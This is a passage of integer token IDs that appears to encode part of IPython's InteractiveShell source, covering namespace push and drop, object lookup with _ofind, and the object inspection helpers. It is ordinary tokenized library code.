220, 220, 220, 220, 220, 611, 318, 39098, 7, 25641, 2977, 11, 965, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 410, 4868, 796, 9633, 13, 35312, 3419, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 410, 4868, 796, 9633, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 410, 11600, 796, 23884, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 30218, 796, 25064, 13557, 1136, 14535, 7, 16, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 329, 1438, 287, 410, 4868, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 410, 11600, 58, 3672, 60, 796, 5418, 7, 3672, 11, 30218, 13, 69, 62, 4743, 672, 874, 11, 30218, 13, 69, 62, 17946, 874, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2845, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3601, 10786, 23722, 407, 651, 7885, 4064, 82, 422, 4064, 82, 6, 4064, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 357, 3672, 11, 12993, 13, 69, 62, 8189, 13, 1073, 62, 3672, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5298, 11052, 12331, 10786, 25641, 2977, 1276, 307, 257, 8633, 14, 2536, 14, 4868, 14, 83, 29291, 11537, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 8772, 37861, 9633, 284, 2836, 25745, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 7220, 62, 5907, 13, 19119, 7, 85, 11600, 8, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 843, 17425, 14333, 20742, 198, 220, 220, 220, 220, 220, 220, 220, 2836, 62, 5907, 62, 30342, 796, 2116, 13, 7220, 62, 5907, 62, 30342, 198, 220, 220, 220, 220, 220, 220, 220, 611, 14333, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 329, 1438, 287, 410, 11600, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2836, 62, 5907, 62, 30342, 13, 12924, 7, 3672, 11, 6045, 8, 198, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2836, 62, 5907, 62, 30342, 13, 19119, 7, 85, 11600, 8, 628, 220, 220, 220, 825, 4268, 62, 1525, 62, 312, 7, 944, 11, 9633, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 27914, 257, 8633, 286, 9633, 422, 262, 2836, 25745, 11, 611, 484, 389, 262, 198, 220, 220, 220, 220, 220, 220, 220, 976, 355, 262, 3815, 287, 262, 22155, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 220, 220, 220, 220, 770, 318, 5292, 329, 779, 416, 18366, 25, 9633, 326, 484, 1053, 2087, 460, 198, 220, 220, 220, 220, 220, 220, 220, 307, 2077, 736, 503, 611, 484, 389, 49975, 11, 1231, 10829, 597, 326, 262, 198, 220, 220, 220, 220, 220, 220, 220, 2836, 468, 6993, 9108, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 220, 220, 220, 220, 40117, 198, 220, 220, 220, 220, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 220, 220, 220, 220, 9633, 1058, 8633, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 317, 22155, 16855, 2134, 3891, 357, 292, 13042, 8, 284, 262, 5563, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 329, 1438, 11, 26181, 287, 9633, 13, 23814, 33529, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 1438, 287, 2116, 13, 7220, 62, 5907, 290, 2116, 13, 7220, 62, 5907, 58, 3672, 60, 318, 26181, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1619, 2116, 13, 7220, 62, 5907, 58, 3672, 60, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 7220, 62, 5907, 62, 30342, 13, 12924, 7, 3672, 11, 6045, 8, 628, 220, 220, 220, 1303, 10097, 45537, 198, 220, 220, 220, 1303, 11597, 3519, 284, 2134, 18951, 31308, 198, 220, 220, 220, 1303, 10097, 45537, 628, 220, 220, 220, 825, 4808, 1659, 521, 7, 944, 11, 319, 480, 11, 3891, 43076, 28, 14202, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 16742, 281, 2134, 287, 262, 1695, 3891, 43076, 13, 628, 220, 220, 220, 220, 220, 220, 220, 2116, 13557, 1659, 521, 7, 261, 480, 8, 4613, 8633, 351, 8251, 25, 1043, 11, 26801, 11, 24912, 11, 1042, 9083, 628, 220, 220, 220, 220, 220, 220, 220, 7875, 2041, 2438, 284, 4886, 5536, 5499, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 319, 480, 796, 319, 480, 13, 36311, 3419, 198, 220, 220, 220, 220, 220, 220, 220, 611, 407, 319, 480, 13, 9688, 2032, 342, 7, 1546, 34, 62, 45820, 2149, 8, 290, 3467, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 407, 319, 480, 13, 9688, 2032, 342, 7, 1546, 34, 62, 45820, 2149, 17, 8, 290, 3467, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 407, 477, 7, 64, 13, 271, 738, 7483, 3419, 329, 257, 287, 319, 480, 13, 35312, 7203, 19570, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 1391, 6, 9275, 10354, 10352, 92, 628, 220, 220, 220, 220, 220, 220, 220, 611, 3891, 43076, 318, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 28531, 43076, 284, 2989, 287, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 5930, 606, 287, 257, 1351, 13, 383, 1502, 318, 1593, 523, 326, 356, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 1064, 1243, 287, 262, 976, 1502, 326, 11361, 7228, 606, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3891, 43076, 796, 685, 19203, 9492, 5275, 3256, 2116, 13, 7220, 62, 5907, 828, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 19203, 9492, 5275, 357, 20541, 8, 3256, 2116, 13, 7220, 62, 20541, 62, 5907, 828, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 19203, 37906, 3170, 259, 3256, 3170, 259, 62, 4666, 13, 834, 11600, 834, 828, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2361, 628, 220, 220, 220, 220, 220, 220, 220, 318, 32707, 796, 10352, 198, 220, 220, 220, 220, 220, 220, 220, 318, 26011, 796, 10352, 198, 220, 220, 220, 220, 220, 220, 220, 1043, 796, 10352, 198, 220, 220, 220, 220, 220, 220, 220, 267, 13200, 796, 6045, 198, 220, 220, 220, 220, 220, 220, 220, 2560, 796, 6045, 198, 220, 220, 220, 220, 220, 220, 220, 26181, 796, 6045, 628, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 6803, 329, 262, 1813, 1438, 416, 26021, 340, 287, 3354, 13, 220, 1002, 262, 1182, 318, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 1043, 11, 788, 356, 804, 329, 477, 262, 5637, 3354, 355, 1866, 11, 290, 691, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 13627, 1943, 611, 356, 460, 1064, 606, 477, 13, 198, 220, 220, 220, 220, 220, 220, 220, 319, 480, 62, 42632, 796, 319, 480, 13, 35312, 10786, 2637, 8, 198, 220, 220, 220, 220, 220, 220, 220, 319, 480, 62, 2256, 11, 319, 480, 62, 2118, 796, 319, 480, 62, 42632, 58, 15, 4357, 261, 480, 62, 42632, 58, 16, 47715, 198, 220, 220, 220, 220, 220, 220, 220, 329, 36545, 3672, 11, 5907, 287, 3891, 43076, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 26181, 796, 36545, 58, 261, 480, 62, 2256, 60, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2845, 7383, 12331, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2555, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 329, 4686, 87, 11, 636, 287, 27056, 378, 7, 261, 480, 62, 2118, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2560, 796, 26181, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 383, 938, 636, 318, 3114, 510, 287, 257, 2041, 835, 284, 3368, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 43087, 43219, 355, 340, 743, 5298, 393, 423, 1735, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 3048, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 4686, 87, 6624, 18896, 7, 261, 480, 62, 2118, 8, 532, 352, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 26181, 796, 2116, 13557, 1136, 35226, 62, 26745, 7, 26801, 11, 636, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 26181, 796, 651, 35226, 7, 26801, 11, 636, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2845, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 31990, 316, 2845, 275, 14, 66, 617, 11234, 9177, 5563, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 1249, 11593, 1136, 35226, 834, 284, 5298, 13269, 584, 621, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 3460, 4163, 12331, 11, 543, 788, 17616, 6101, 7535, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2270, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 1002, 356, 5461, 262, 329, 9052, 357, 3919, 2270, 828, 356, 1392, 477, 1866, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1043, 796, 6407, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 267, 13200, 796, 36545, 3672, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2270, 220, 1303, 25745, 9052, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 9993, 284, 766, 611, 340, 338, 5536, 198, 220, 220, 220, 220, 220, 220, 220, 611, 407, 1043, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 26181, 796, 6045, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 319, 480, 13, 9688, 2032, 342, 7, 1546, 34, 62, 45820, 2149, 17, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 319, 480, 796, 319, 480, 13, 75, 36311, 7, 1546, 34, 62, 45820, 2149, 17, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 26181, 796, 2116, 13, 19796, 62, 3846, 62, 32707, 7, 261, 480, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1288, 361, 319, 480, 13, 9688, 2032, 342, 7, 1546, 34, 62, 45820, 2149, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 319, 480, 796, 319, 480, 13, 75, 36311, 7, 1546, 34, 62, 45820, 2149, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 26181, 796, 2116, 13, 19796, 62, 1370, 62, 32707, 7, 261, 480, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 2989, 1231, 21231, 11, 523, 1057, 30, 481, 1064, 4064, 5143, 30, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 26181, 796, 2116, 13, 19796, 62, 1370, 62, 32707, 7, 261, 480, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 26181, 318, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 26181, 796, 2116, 13, 19796, 62, 3846, 62, 32707, 7, 261, 480, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 26181, 318, 407, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1043, 796, 6407, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 267, 13200, 796, 705, 4061, 7535, 5387, 6, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 318, 32707, 796, 6407, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 318, 26011, 796, 318, 39098, 7, 26801, 11, 978, 4448, 8, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 4586, 1949, 25, 2041, 12, 7442, 617, 4187, 874, 588, 705, 3256, 685, 4357, 1391, 5512, 3503, 25, 198, 220, 220, 220, 220, 220, 220, 220, 611, 407, 1043, 290, 319, 480, 62, 2256, 287, 14631, 7061, 1600, 6, 15931, 41707, 21737, 41707, 90, 92, 41707, 3419, 6, 5974, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 26181, 796, 5418, 7, 261, 480, 62, 2256, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1043, 796, 6407, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 267, 13200, 796, 705, 9492, 5275, 6, 628, 220, 220, 220, 220, 220, 220, 220, 1441, 1391, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 705, 26801, 10354, 26801, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 705, 9275, 10354, 9275, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 705, 8000, 10354, 8000, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 705, 1042, 9083, 10354, 1042, 9083, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 705, 271, 26011, 10354, 271, 26011, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 705, 14933, 10223, 10354, 24912, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1782, 628, 220, 220, 220, 2488, 12708, 24396, 198, 220, 220, 220, 825, 4808, 1136, 35226, 62, 26745, 7, 26801, 11, 708, 81, 3672, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 21746, 12, 9685, 651, 35226, 284, 779, 287, 2134, 4917, 13, 628, 220, 220, 220, 220, 220, 220, 220, 1002, 708, 81, 3672, 6870, 257, 3119, 11, 1441, 340, 555, 18206, 6605, 357, 259, 1339, 340, 468, 198, 220, 220, 220, 220, 220, 220, 220, 1735, 3048, 393, 12073, 281, 4049, 13, 628, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 611, 407, 318, 39098, 7, 26801, 11, 2099, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 4600, 1136, 35226, 7, 4906, 7, 26801, 828, 708, 81, 3672, 8, 63, 318, 407, 11462, 284, 1441, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 4600, 26801, 47671, 475, 857, 523, 329, 3119, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 3119, 13, 834, 1136, 834, 7, 944, 11, 6045, 11, 537, 82, 8, 4613, 2116, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 383, 10112, 5559, 318, 284, 38138, 262, 285, 305, 14500, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 10342, 329, 708, 81, 3672, 287, 1398, 8633, 82, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 708, 81, 796, 651, 35226, 7, 4906, 7, 26801, 828, 708, 81, 3672, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2845, 3460, 4163, 12331, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1208, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 770, 16507, 319, 262, 1109, 326, 1366, 12145, 669, 357, 4480, 1111, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 11593, 1136, 834, 1222, 11593, 2617, 834, 5536, 5050, 8, 1011, 38177, 625, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 4554, 12, 5715, 12608, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 220, 220, 220, 1398, 317, 7, 15252, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 220, 220, 220, 220, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 220, 220, 220, 220, 220, 220, 220, 825, 11511, 30973, 7, 944, 2599, 1441, 17031, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 220, 220, 220, 257, 796, 317, 3419, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 220, 220, 220, 257, 13, 834, 11600, 834, 17816, 6513, 30973, 20520, 796, 39937, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 220, 220, 220, 257, 13, 6513, 30973, 220, 1303, 6624, 17031, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 1406, 11, 257, 3119, 743, 307, 4504, 826, 1497, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 318, 39098, 7, 35226, 11, 3119, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 708, 81, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 10528, 4193, 11, 2121, 736, 13, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 651, 35226, 7, 26801, 11, 708, 81, 3672, 8, 628, 220, 220, 220, 825, 4808, 15252, 62, 19796, 7, 944, 11, 319, 480, 11, 3891, 43076, 28, 14202, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 16742, 281, 2134, 290, 1441, 257, 2878, 351, 7508, 546, 340, 526, 15931, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 32112, 7, 944, 13557, 1659, 521, 7, 261, 480, 11, 3891, 43076, 4008, 628, 220, 220, 220, 825, 4808, 1040, 806, 7, 944, 11, 11248, 11, 319, 480, 11, 3891, 43076, 28, 14202, 11, 12429, 46265, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 46189, 7071, 284, 262, 24110, 1080, 13, 628, 220, 220, 220, 220, 220, 220, 220, 770, 2163, 318, 4001, 284, 307, 1444, 416, 279, 4299, 11, 279, 15390, 1222, 2460, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 7508, 796, 2116, 13557, 15252, 62, 19796, 7, 261, 480, 11, 3891, 43076, 8, 198, 220, 220, 220, 220, 220, 220, 220, 2205, 18982, 796, 599, 20079, 87, 1958, 611, 2116, 13, 82, 746, 28413, 1958, 62, 15390, 8841, 2073, 6045, 198, 220, 220, 220, 220, 220, 220, 220, 611, 7508, 13, 9275, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 279, 24396, 796, 651, 35226, 7, 944, 13, 1040, 806, 273, 11, 11248, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 16926, 46, 25, 691, 4174, 5794, 62, 9612, 284, 262, 8631, 14, 5239, 41575, 286, 262, 285, 524, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 18537, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1296, 1436, 796, 5794, 62, 9612, 611, 7508, 13, 1042, 9083, 2073, 2205, 18982, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 11248, 6624, 705, 79, 15390, 10354, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 279, 24396, 7, 10951, 13, 26801, 11, 319, 480, 11, 1296, 1436, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1288, 361, 11248, 6624, 705, 79, 10951, 10354, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 279, 24396, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 7508, 13, 26801, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 319, 480, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1296, 1436, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 7508, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 7139, 62, 6494, 62, 79, 3536, 28, 944, 13, 21633, 62, 6494, 62, 79, 3536, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 12429, 46265, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1267, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 279, 24396, 7, 10951, 13, 26801, 11, 319, 480, 8, 198, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3601, 10786, 10267, 4600, 4, 82, 63, 407, 1043, 2637, 4064, 319, 480, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 705, 1662, 1043, 6, 220, 1303, 523, 869, 364, 460, 1011, 584, 2223, 628, 220, 220, 220, 825, 2134, 62, 1040, 806, 7, 944, 11, 319, 480, 11, 3703, 62, 5715, 28, 15, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 3855, 2134, 7508, 546, 319, 480, 37811, 198, 220, 220, 220, 220, 220, 220, 220, 351, 2116, 13, 18780, 259, 62, 46670, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 7508, 796, 2116, 13557, 15252, 62, 19796, 7, 261, 480, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 7508, 13, 9275, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 2116, 13, 1040, 806, 273, 13, 10951, 7, 10951, 13, 26801, 11, 319, 480, 11, 7508, 28, 10951, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3703, 62, 5715, 28, 49170, 62, 5715, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1267, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 267, 1040, 806, 13, 15252, 62, 10951, 7, 3672, 28, 261, 480, 11, 1043, 28, 25101, 8, 628, 220, 220, 220, 825, 2134, 62, 1040, 806, 62, 5239, 7, 944, 11, 319, 480, 11, 3703, 62, 5715, 28, 15, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 3855, 2134, 7508, 355, 39559, 2420, 37811, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 2116, 13, 15252, 62, 1040, 806, 62, 76, 524, 7, 261, 480, 11, 3703, 62, 5715, 8, 17816, 5239, 14, 25638, 20520, 628, 220, 220, 220, 825, 2134, 62, 1040, 806, 62, 76, 524, 7, 944, 11, 319, 480, 11, 3703, 62, 5715, 28, 15, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 3855, 2134, 7508, 355, 257, 285, 524, 65, 31249, 286, 39559, 24612, 13, 628, 220, 220, 220, 220, 220, 220, 220, 317, 285, 524, 65, 31249, 318, 257, 22155, 11, 1994, 276, 416, 285, 524, 12, 4906, 13, 198, 220, 220, 220, 220, 220, 220, 220, 632, 1276, 1464, 423, 262, 1994, 4600, 6, 5239, 14, 25638, 6, 44646, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 351, 2116, 13, 18780, 259, 62, 46670, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 7508, 796, 2116, 